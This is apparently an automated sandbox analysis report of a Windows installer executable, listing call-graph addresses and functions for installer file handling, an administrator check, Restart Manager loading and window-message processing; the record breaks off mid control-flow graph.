40e96c 53895->53931 53897 403778 18 API calls 53899 40e0d7 53897->53899 53898 40e18d 53900 40e1b7 53898->53900 53901 40e1a8 53898->53901 53899->53897 53899->53898 53994 40d774 19 API calls 53899->53994 53995 40e080 19 API calls 53899->53995 53991 40ba24 53900->53991 53940 40e3c0 53901->53940 53907 40e1b5 53908 403400 4 API calls 53907->53908 53909 40e25c 53908->53909 53909->53884 53912 40ea08 19 API calls 53911->53912 53913 40d5ea 53912->53913 53913->53884 54028 40d4bc 53914->54028 54037 40df54 53917->54037 53920 40e96c 19 API calls 53921 40db9e 53920->53921 53922 40e96c 19 API calls 53921->53922 53923 40dba9 53922->53923 53924 40dbc4 53923->53924 53925 40dbbb 53923->53925 53930 40dbc1 53923->53930 54044 40d9d8 53924->54044 54047 40dac8 33 API calls 53925->54047 53928 403420 4 API calls 53929 40dc8f 53928->53929 53929->53890 53930->53928 53997 40d780 53931->53997 53934 4034e0 18 API calls 53935 40e98f 53934->53935 53936 403744 18 API calls 53935->53936 53937 40e996 53936->53937 53938 40d780 19 API calls 53937->53938 53939 40e9a4 53938->53939 53939->53899 53941 40e3ec 53940->53941 53943 40e3f6 53940->53943 54002 40d440 19 API calls 53941->54002 53944 40e511 53943->53944 53945 40e495 53943->53945 53946 40e4f6 53943->53946 53947 40e576 53943->53947 53948 40e438 53943->53948 53949 40e4d9 53943->53949 53950 40e47a 53943->53950 53951 40e4bb 53943->53951 53962 40e45c 53943->53962 53954 40d764 19 API calls 53944->53954 54010 40de24 19 API calls 53945->54010 54015 40e890 19 API calls 53946->54015 53958 40d764 19 API calls 53947->53958 54003 40d764 53948->54003 54013 40e9a8 19 API calls 53949->54013 54009 40d818 19 API calls 53950->54009 54012 40dde4 19 API calls 53951->54012 53963 40e519 53954->53963 53957 403400 4 API calls 53964 40e5eb 53957->53964 53965 40e57e 53958->53965 53961 40e4a0 54011 40d470 19 API calls 53961->54011 53962->53957 53971 40e523 53963->53971 53972 40e51d 53963->53972 53964->53907 53973 40e582 53965->53973 53974 40e59b 53965->53974 53966 40e4e4 54014 409d38 18 API calls 53966->54014 53968 40e461 54008 40ded8 19 API calls 53968->54008 53969 40e444 54006 40de24 19 API calls 53969->54006 54016 40ea08 53971->54016 53979 40e521 53972->53979 53980 40e53c 53972->53980 53982 40ea08 19 API calls 53973->53982 54022 40de24 19 API calls 53974->54022 54020 40de24 19 API calls 53979->54020 53983 40ea08 19 API calls 53980->53983 53982->53962 53985 40e544 53983->53985 53984 40e44f 54007 40e26c 19 API calls 53984->54007 54019 40d8a0 19 API calls 53985->54019 53988 40e566 54021 40e2d4 18 API calls 53988->54021 54023 40b9d0 53991->54023 53994->53899 53995->53899 53996 40d774 19 API calls 53996->53907 54000 40d78b 53997->54000 53998 40d7c5 53998->53934 54000->53998 54001 40d7cc 19 API calls 54000->54001 54001->54000 54002->53943 54004 40ea08 19 API calls 54003->54004 54005 40d76e 54004->54005 54005->53968 54005->53969 54006->53984 54007->53962 54008->53962 54009->53962 54010->53961 54011->53962 54012->53962 54013->53966 54014->53962 54015->53962 54017 40d780 19 API calls 54016->54017 54018 40ea15 54017->54018 54018->53962 54019->53962 54020->53988 54021->53962 54022->53962 54024 40b9e2 54023->54024 54026 40ba07 54023->54026 54024->54026 54027 40ba84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54024->54027 54026->53907 54026->53996 54027->54026 54029 40ea08 19 API calls 54028->54029 54031 40d4c9 54029->54031 54030 40d4dc 54030->53890 54031->54030 54035 40eb0c 19 API calls 54031->54035 54033 40d4d7 54036 40d458 19 API calls 54033->54036 54035->54033 54036->54030 54038 40d764 19 API calls 54037->54038 54039 40df6b 54038->54039 54040 40ea08 19 API calls 54039->54040 54043 40db93 54039->54043 54041 40df78 54040->54041 54041->54043 54048 40ded8 19 API calls 54041->54048 54043->53920 54049 40ab7c 33 API calls 54044->54049 54046 40da00 54046->53930 54047->53930 54048->54043 54049->54046 56252 40ce7c 56253 40ce84 56252->56253 56254 40ceae 56253->56254 56255 40ceb2 56253->56255 56256 40cea7 56253->56256 56258 40ceb6 56255->56258 56259 40cec8 56255->56259 56264 406288 GlobalHandle GlobalUnWire GlobalFree 56256->56264 56265 40625c GlobalAlloc GlobalFix 56258->56265 56266 40626c GlobalHandle GlobalUnWire GlobalReAlloc GlobalFix 56259->56266 56262 40cec4 56262->56254 56263 408cbc 19 API calls 56262->56263 56263->56254 56264->56254 56265->56262 56266->56262 56267 41363c SetWindowLongA GetWindowLongA 56268 413699 SetPropA SetPropA 56267->56268 56269 41367b GetWindowLongA 56267->56269 56274 41f39c 56268->56274 56269->56268 56270 41368a SetWindowLongA 56269->56270 56270->56268 56279 415270 56274->56279 56286 423c0c 56274->56286 56380 423a84 56274->56380 56275 4136e9 56280 41527d 56279->56280 56281 4152e3 56280->56281 56282 4152d8 56280->56282 56285 4152e1 56280->56285 56387 424b8c 13 API calls 56281->56387 56282->56285 56388 41505c 60 API calls 56282->56388 56285->56275 56289 423c42 56286->56289 56303 423c63 56289->56303 56389 423b68 56289->56389 56290 423cec 56292 423cf3 56290->56292 56293 423d27 56290->56293 56291 423c8d 56294 423c93 56291->56294 56295 423d50 56291->56295 56298 423cf9 56292->56298 56338 423fb1 56292->56338 56301 423d32 56293->56301 56302 42409a IsIconic 56293->56302 56299 423cc5 56294->56299 56300 423c98 56294->56300 56296 423d62 56295->56296 56297 423d6b 56295->56297 56304 423d78 56296->56304 56305 423d69 56296->56305 56396 424194 11 API calls 56297->56396 56307 423f13 SendMessageA 56298->56307 56308 423d07 56298->56308 56299->56303 56329 423cde 56299->56329 56330 423e3f 56299->56330 56310 423df6 56300->56310 56311 423c9e 56300->56311 56312 4240d6 56301->56312 56313 423d3b 56301->56313 56302->56303 56309 4240ae GetFocus 56302->56309 56303->56275 56315 4241dc 11 API calls 56304->56315 56397 423b84 NtdllDefWindowProc_A 56305->56397 56307->56303 56308->56303 56339 423cc0 56308->56339 56359 423f56 56308->56359 56309->56303 56316 4240bf 56309->56316 56401 423b84 NtdllDefWindowProc_A 56310->56401 56317 423ca7 56311->56317 56318 423e1e PostMessageA 56311->56318 56410 424850 WinHelpA PostMessageA 56312->56410 56314 4240ed 56313->56314 56313->56339 56327 4240f6 56314->56327 56328 42410b 56314->56328 56315->56303 56409 41eff4 GetCurrentThreadId EnumThreadWindows 56316->56409 56324 423cb0 56317->56324 56325 423ea5 56317->56325 56402 423b84 NtdllDefWindowProc_A 56318->56402 56333 423cb9 56324->56333 56334 423dce IsIconic 56324->56334 56335 423eae 56325->56335 56336 423edf 56325->56336 56326 423e39 56326->56303 56337 4244d4 19 API calls 56327->56337 56411 42452c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 56328->56411 56329->56339 56340 423e0b 56329->56340 56393 423b84 NtdllDefWindowProc_A 56330->56393 56332 4240c6 56332->56303 56344 4240ce SetFocus 56332->56344 56333->56339 56345 423d91 56333->56345 56347 423dea 56334->56347 56348 423dde 56334->56348 56404 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56335->56404 56394 423b84 NtdllDefWindowProc_A 56336->56394 56337->56303 56338->56303 56354 423fd7 IsWindowEnabled 56338->56354 56339->56303 56395 423b84 NtdllDefWindowProc_A 56339->56395 56342 424178 26 API calls 56340->56342 56342->56303 56343 423e45 56351 423e83 56343->56351 56352 423e61 56343->56352 56344->56303 56345->56303 56398 422c4c ShowWindow PostMessageA PostQuitMessage 56345->56398 56400 423b84 NtdllDefWindowProc_A 56347->56400 56399 423bc0 29 API calls 56348->56399 56360 423a84 6 API calls 56351->56360 56403 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56352->56403 56353 423eb6 56362 423ec8 56353->56362 56369 41ef58 6 API calls 56353->56369 56354->56303 56363 423fe5 56354->56363 56357 423ee5 56364 423efd 56357->56364 56371 41eea4 2 API calls 56357->56371 56359->56303 56367 423f78 IsWindowEnabled 56359->56367 56368 423e8b PostMessageA 56360->56368 56405 423b84 NtdllDefWindowProc_A 56362->56405 56373 423fec IsWindowVisible 56363->56373 56365 423a84 6 API calls 56364->56365 56365->56303 56366 423e69 PostMessageA 56366->56303 56367->56303 56372 423f86 56367->56372 56368->56303 56369->56362 56371->56364 56406 412310 21 API calls 56372->56406 56373->56303 56375 423ffa GetFocus 56373->56375 56376 4181e0 56375->56376 56377 42400f SetFocus 56376->56377 56407 415240 56377->56407 56381 423b0d 56380->56381 56382 423a94 56380->56382 56381->56275 56382->56381 56383 423a9a EnumWindows 56382->56383 56383->56381 56384 423ab6 GetWindow GetWindowLongA 56383->56384 56412 423a1c GetWindow 56383->56412 56385 423ad5 56384->56385 56385->56381 56386 423b01 SetWindowPos 56385->56386 56386->56381 56386->56385 56387->56285 56388->56285 56390 423b72 56389->56390 56391 423b7d 56389->56391 56390->56391 56392 408720 21 API calls 56390->56392 56391->56290 56391->56291 56392->56391 56393->56343 56394->56357 56395->56303 56396->56303 56397->56303 56398->56303 56399->56303 56400->56303 56401->56303 56402->56326 56403->56366 56404->56353 56405->56303 56406->56303 56408 41525b SetFocus 56407->56408 56408->56303 56409->56332 56410->56326 56411->56326 56413 423a3d GetWindowLongA 56412->56413 56414 423a49 56412->56414 56413->56414 56415 4809f7 56416 480a00 56415->56416 56418 480a2b 56415->56418 56417 480a1d 56416->56417 56416->56418 56787 476c50 203 API calls 56417->56787 56419 480a6a 56418->56419 56789 47f4a4 18 API calls 56418->56789 56420 480a8e 56419->56420 56423 480a81 56419->56423 56424 480a83 56419->56424 56429 480aca 56420->56429 56430 480aac 56420->56430 56433 47f4e8 56 API calls 56423->56433 56791 47f57c 56 API calls 56424->56791 56425 480a22 56425->56418 56788 408be0 19 API calls 56425->56788 56426 480a5d 56790 47f50c 56 API calls 56426->56790 56794 47f33c 38 API calls 56429->56794 56434 480ac1 56430->56434 56792 47f50c 56 API calls 56430->56792 56433->56420 56793 47f33c 38 API calls 56434->56793 56437 480ac8 56438 480ada 56437->56438 56439 480ae0 56437->56439 56440 480ade 56438->56440 56444 47f4e8 56 API calls 56438->56444 56439->56440 56442 47f4e8 56 API calls 56439->56442 56541 47c66c 56440->56541 56442->56440 56444->56440 56542 42d898 GetWindowsDirectoryA 56541->56542 56543 47c690 56542->56543 56544 403450 18 API calls 56543->56544 56545 47c69d 56544->56545 56546 42d8c4 GetSystemDirectoryA 56545->56546 56547 47c6a5 56546->56547 56548 403450 18 API calls 56547->56548 56549 47c6b2 56548->56549 56550 42d8f0 6 API calls 56549->56550 56551 47c6ba 56550->56551 56552 403450 18 API calls 56551->56552 56553 47c6c7 56552->56553 56554 47c6d0 56553->56554 56555 47c6ec 56553->56555 56826 42d208 56554->56826 56557 403400 4 API calls 56555->56557 56559 47c6ea 56557->56559 56561 47c731 56559->56561 56563 42c8cc 19 API calls 56559->56563 56560 403450 18 API calls 56560->56559 56806 47c4f4 56561->56806 56565 47c70c 56563->56565 56567 403450 18 API calls 56565->56567 56566 403450 18 API calls 56568 47c74d 56566->56568 56569 47c719 56567->56569 56570 47c76b 56568->56570 56571 4035c0 18 API calls 56568->56571 56569->56561 56573 403450 18 API calls 56569->56573 56572 47c4f4 22 API calls 56570->56572 56571->56570 56574 47c77a 56572->56574 56573->56561 56575 403450 18 API calls 56574->56575 56576 47c787 56575->56576 56577 47c7af 56576->56577 56579 42c3fc 19 API calls 56576->56579 56578 47c816 56577->56578 56580 47c4f4 22 API calls 56577->56580 56582 47c8de 56578->56582 56583 47c836 SHGetKnownFolderPath 56578->56583 56581 47c79d 56579->56581 56584 47c7c7 56580->56584 56587 4035c0 18 API calls 56581->56587 56585 47c8e7 56582->56585 56586 47c908 56582->56586 56588 47c850 56583->56588 56589 47c88b SHGetKnownFolderPath 56583->56589 56590 403450 18 API calls 56584->56590 56591 42c3fc 19 API calls 56585->56591 56592 42c3fc 19 API calls 56586->56592 56587->56577 56589->56582 56787->56425 56789->56426 56790->56419 56791->56420 56792->56434 56793->56437 56794->56437 56807 42de1c RegOpenKeyExA 56806->56807 56808 47c51a 56807->56808 56809 47c540 56808->56809 56810 47c51e 56808->56810 56811 403400 4 API calls 56809->56811 56812 42dd4c 20 API calls 56810->56812 56813 47c547 56811->56813 56814 47c52a 56812->56814 56813->56566 56815 47c535 RegCloseKey 56814->56815 56816 403400 4 API calls 56814->56816 56815->56813 56816->56815 56827 4038a4 18 API calls 56826->56827 56828 42d21b 56827->56828 56829 42d232 GetEnvironmentVariableA 56828->56829 56833 42d245 56828->56833 56838 42dbd0 18 API calls 56828->56838 56829->56828 56830 42d23e 56829->56830 56832 403400 4 API calls 56830->56832 56832->56833 56833->56560 56838->56828

                                                                                                                            Executed Functions

                                                                                                                            Function 004706A8 Relevance: 78.0, APIs: 4, Strings: 40, Instructions: 965COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • Installing into GAC, xrefs: 00471714
                                                                                                                            • Non-default bitness: 32-bit, xrefs: 004708BB
                                                                                                                            • Same version. Skipping., xrefs: 00470CE5
                                                                                                                            • Uninstaller requires administrator: %s, xrefs: 0047118F
                                                                                                                            • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
                                                                                                                            • Version of existing file: (none), xrefs: 00470CFA
                                                                                                                            • Dest file exists., xrefs: 004709BB
                                                                                                                            • Existing file is a newer version. Skipping., xrefs: 00470C02
                                                                                                                            • Stripped read-only attribute., xrefs: 00470EC7
                                                                                                                            • Same time stamp. Skipping., xrefs: 00470D55
                                                                                                                            • Existing file has a later time stamp. Skipping., xrefs: 00470DCF
                                                                                                                            • Time stamp of our file: %s, xrefs: 0047099B
                                                                                                                            • Dest file is protected by Windows File Protection., xrefs: 004708ED
                                                                                                                            • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
                                                                                                                            • Couldn't read time stamp. Skipping., xrefs: 00470D35
                                                                                                                            • Incrementing shared file count (64-bit)., xrefs: 0047158C
                                                                                                                            • Non-default bitness: 64-bit, xrefs: 004708AF
                                                                                                                            • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
                                                                                                                            • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
                                                                                                                            • -- File entry --, xrefs: 004706FB
                                                                                                                            • InUn, xrefs: 0047115F
                                                                                                                            • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
                                                                                                                            • , xrefs: 00470BCF, 00470DA0, 00470E1E
                                                                                                                            • Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
                                                                                                                            • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
                                                                                                                            • Incrementing shared file count (32-bit)., xrefs: 004715A5
                                                                                                                            • Installing the file., xrefs: 00470F09
                                                                                                                            • Failed to strip read-only attribute., xrefs: 00470ED3
                                                                                                                            • Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
                                                                                                                            • Dest filename: %s, xrefs: 00470894
                                                                                                                            • Time stamp of our file: (failed to read), xrefs: 004709A7
                                                                                                                            • Will register the file (a DLL/OCX) later., xrefs: 0047151F
                                                                                                                            • Time stamp of existing file: (failed to read), xrefs: 00470A37
                                                                                                                            • Time stamp of existing file: %s, xrefs: 00470A2B
                                                                                                                            • Version of our file: (none), xrefs: 00470AFC
                                                                                                                            • Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
                                                                                                                            • @, xrefs: 004707B0
                                                                                                                            • Will register the file (a type library) later., xrefs: 00471513
                                                                                                                            • User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
                                                                                                                            • .tmp, xrefs: 00470FB7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                                                            • API String ID: 0-4021121268
                                                                                                                            • Opcode ID: 6e9aa0429d3ef6c301c4ffa8bc69751cfab5ace8c443bbbcc7db1e17fca961c0
                                                                                                                            • Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
                                                                                                                            • Opcode Fuzzy Hash: 6e9aa0429d3ef6c301c4ffa8bc69751cfab5ace8c443bbbcc7db1e17fca961c0
                                                                                                                            • Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042E09C Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 178memorylibraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1578 42e09c-42e0ad 1579 42e0b8-42e0dd AllocateAndInitializeSid 1578->1579 1580 42e0af-42e0b3 1578->1580 1581 42e287-42e28f 1579->1581 1582 42e0e3-42e100 GetVersion 1579->1582 1580->1581 1583 42e102-42e117 GetModuleHandleA GetProcAddress 1582->1583 1584 42e119-42e11b 1582->1584 1583->1584 1585 42e142-42e15c GetCurrentThread OpenThreadToken 1584->1585 1586 42e11d-42e12b CheckTokenMembership 1584->1586 1589 42e193-42e1bb GetTokenInformation 1585->1589 1590 42e15e-42e168 GetLastError 1585->1590 1587 42e131-42e13d 1586->1587 1588 42e269-42e27f FreeSid 1586->1588 1587->1588 1591 42e1d6-42e1fa call 402648 GetTokenInformation 1589->1591 1592 42e1bd-42e1c5 GetLastError 1589->1592 1593 42e174-42e187 GetCurrentProcess OpenProcessToken 1590->1593 1594 42e16a-42e16f call 4031bc 1590->1594 1605 42e208-42e210 1591->1605 1606 42e1fc-42e206 call 4031bc * 2 1591->1606 1592->1591 1595 42e1c7-42e1d1 call 4031bc * 2 1592->1595 1593->1589 1598 42e189-42e18e call 4031bc 1593->1598 1594->1581 1595->1581 1598->1581 1607 42e212-42e213 1605->1607 1608 42e243-42e261 call 402660 CloseHandle 1605->1608 1606->1581 1611 42e215-42e228 EqualSid 1607->1611 1615 42e22a-42e237 1611->1615 1616 42e23f-42e241 1611->1616 1615->1616 1619 42e239-42e23d 1615->1619 1616->1608 1616->1611 1619->1608
                                                                                                                            APIs
                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                                                                                            • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                                                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                                                                                            • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                            • API String ID: 2252812187-1888249752
                                                                                                                            • Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                                                            • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                                                                                            • Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                                                            • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004502C0 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 45libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1642 4502c0-4502cd 1643 4502d3-4502e0 GetVersion 1642->1643 1644 45037c-450386 1642->1644 1643->1644 1645 4502e6-4502fc LoadLibraryA 1643->1645 1645->1644 1646 4502fe-450377 GetProcAddress * 6 1645->1646 1646->1644
                                                                                                                            APIs
                                                                                                                            • GetVersion.KERNEL32(00480B52), ref: 004502D3
                                                                                                                            • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
                                                                                                                            • GetProcAddress.KERNEL32(6CC70000,RmStartSession), ref: 00450309
                                                                                                                            • GetProcAddress.KERNEL32(6CC70000,RmRegisterResources), ref: 0045031E
                                                                                                                            • GetProcAddress.KERNEL32(6CC70000,RmGetList), ref: 00450333
                                                                                                                            • GetProcAddress.KERNEL32(6CC70000,RmShutdown), ref: 00450348
                                                                                                                            • GetProcAddress.KERNEL32(6CC70000,RmRestart), ref: 0045035D
                                                                                                                            • GetProcAddress.KERNEL32(6CC70000,RmEndSession), ref: 00450372
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoadVersion
                                                                                                                            • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                                                            • API String ID: 1968650500-3419246398
                                                                                                                            • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                                                            • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                                                                                            • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                                                            • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00423C0C Relevance: 21.4, APIs: 14, Instructions: 395COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1790 423c0c-423c40 1791 423c42-423c43 1790->1791 1792 423c74-423c8b call 423b68 1790->1792 1794 423c45-423c61 call 40b24c 1791->1794 1798 423cec-423cf1 1792->1798 1799 423c8d 1792->1799 1817 423c63-423c6b 1794->1817 1818 423c70-423c72 1794->1818 1800 423cf3 1798->1800 1801 423d27-423d2c 1798->1801 1802 423c93-423c96 1799->1802 1803 423d50-423d60 1799->1803 1807 423fb1-423fb9 1800->1807 1808 423cf9-423d01 1800->1808 1811 423d32-423d35 1801->1811 1812 42409a-4240a8 IsIconic 1801->1812 1809 423cc5-423cc8 1802->1809 1810 423c98 1802->1810 1805 423d62-423d67 1803->1805 1806 423d6b-423d73 call 424194 1803->1806 1819 423d78-423d80 call 4241dc 1805->1819 1820 423d69-423d8c call 423b84 1805->1820 1813 424152-42415a 1806->1813 1807->1813 1814 423fbf-423fca call 4181e0 1807->1814 1822 423f13-423f3a SendMessageA 1808->1822 1823 423d07-423d0c 1808->1823 1815 423da9-423db0 1809->1815 1816 423cce-423ccf 1809->1816 1825 423df6-423e06 call 423b84 1810->1825 1826 423c9e-423ca1 1810->1826 1827 4240d6-4240eb call 424850 1811->1827 1828 423d3b-423d3c 1811->1828 1812->1813 1824 4240ae-4240b9 GetFocus 1812->1824 1831 424171-424177 1813->1831 1814->1813 1878 423fd0-423fdf call 4181e0 IsWindowEnabled 1814->1878 1815->1813 1840 423db6-423dbd 1815->1840 1841 423cd5-423cd8 1816->1841 1842 423f3f-423f46 1816->1842 1817->1831 1818->1792 1818->1794 1819->1813 1820->1813 1822->1813 1843 423d12-423d13 1823->1843 1844 42404a-424055 1823->1844 1824->1813 1835 4240bf-4240c8 call 41eff4 1824->1835 1825->1813 1836 423ca7-423caa 1826->1836 1837 423e1e-423e3a PostMessageA call 423b84 1826->1837 1827->1813 1829 423d42-423d45 1828->1829 1830 4240ed-4240f4 1828->1830 1847 424120-424127 1829->1847 1848 423d4b 1829->1848 1858 4240f6-424109 call 4244d4 1830->1858 1859 42410b-42411e call 42452c 1830->1859 1835->1813 1891 4240ce-4240d4 SetFocus 1835->1891 1855 423cb0-423cb3 1836->1855 1856 423ea5-423eac 1836->1856 1837->1813 1840->1813 1861 423dc3-423dc9 1840->1861 1862 423cde-423ce1 1841->1862 1863 423e3f-423e5f call 423b84 1841->1863 1842->1813 1851 423f4c-423f51 call 404e54 1842->1851 1864 424072-42407d 1843->1864 1865 423d19-423d1c 1843->1865 1844->1813 1849 42405b-42406d 1844->1849 1882 42413a-424149 1847->1882 1883 424129-424138 1847->1883 1866 42414b-42414c call 423b84 1848->1866 1849->1813 1851->1813 1873 423cb9-423cba 1855->1873 1874 423dce-423ddc IsIconic 1855->1874 1875 423eae-423ec1 call 423b14 1856->1875 1876 423edf-423ef0 call 423b84 1856->1876 1858->1813 1859->1813 1861->1813 1879 423ce7 1862->1879 1880 423e0b-423e19 call 424178 1862->1880 1905 423e83-423ea0 call 423a84 PostMessageA 1863->1905 1906 423e61-423e7e call 423b14 PostMessageA 1863->1906 1864->1813 1867 424083-424095 1864->1867 1884 423d22 1865->1884 1885 423f56-423f5e 1865->1885 1914 424151 1866->1914 1867->1813 1892 423cc0 1873->1892 1893 423d91-423d99 1873->1893 1899 423dea-423df1 call 423b84 1874->1899 1900 423dde-423de5 call 423bc0 1874->1900 1919 423ed3-423eda call 423b84 1875->1919 1920 423ec3-423ecd call 41ef58 